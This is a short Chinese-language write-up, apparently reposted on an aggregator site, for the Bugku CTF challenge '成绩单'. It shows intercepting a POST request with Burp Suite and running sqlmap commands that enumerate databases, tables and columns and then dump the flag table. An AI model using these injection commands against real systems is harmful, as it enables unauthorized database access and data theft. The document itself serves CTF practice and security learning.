sqlmap-post型 bugku 成绩单

Posted ojkojk

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap-post型 bugku 成绩单相关的知识,希望对你有一定的参考价值。

手工注入的话就是常规了,不写了

记录第一次用sqlmap进行post注入

第一步,用bp拦截

技术图片

 

 然后选择Copy to file,保存为txt格式

我这里保存为a.txt

技术图片

 

 

python sqlmap.py -r C:UsersASUSDesktopa.txt --dbs

爆数据库

然后爆表

python sqlmap.py -r C:UsersASUSDesktopa.txt --tables

爆列

python sqlmap.py -r C:UsersASUSDesktopa.txt --columns

爆字段

python sqlmap.py -r C:UsersASUSDesktopa.txt -D skctf_flag -T fl4g -C "skctf_flag" --dump

 

技术图片

 

 完成任务

 

以上是关于sqlmap-post型 bugku 成绩单的主要内容,如果未能解决你的问题,请参考以下文章

bugku-writeup-web-成绩查询

BugKu——Web——成绩查询

编写Java应用程序。首先,定义一个时钟类——Clock,它包括三个int型 成员变量分别表示时分秒,一个构造方法用于对三个成员变量(时分秒) 进行初始化,还有一个成员方法show()用于(代码片

编写Java应用程序。首先,定义一个时钟类——Clock,它包括三个int型 成员变量分别表示时分秒,一个构造方法用于对三个成员变量(时分秒) 进行初始化,还有一个成员方法show()用于显示(代码片

定义一个时钟类——Clock,它包括三个int型 成员变量分别表示时分秒,一个构造方法用于对三个成员变量(时分秒) 进行初始化,还有一个成员方法show()用于显示时钟对象的时间。其次,再定义(代码片

bugku 代码审计